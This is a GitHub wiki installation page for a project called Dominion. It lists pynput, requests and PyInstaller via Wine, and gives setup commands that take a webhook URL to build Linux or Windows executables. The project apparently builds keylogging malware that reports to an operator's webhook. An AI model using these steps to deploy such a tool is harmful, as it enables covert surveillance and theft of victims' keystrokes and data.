You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SAM X86 edited this page Aug 4, 2025
·
2 revisions
Installation
Requirements
Python 3.11 (via Wine for Windows builds)
PyInstaller
Required Python packages:
requests
pynput
thread6
Quick Setup
git clone https://github.com/HackScaleTeam/Dominion.git
cd Dominion
# Example for Linux:
python3 setup.py --webhook <YOUR_WEBHOOK> --linux
# Example for Windows:
python3 setup.py --webhook <YOUR_WEBHOOK> --windows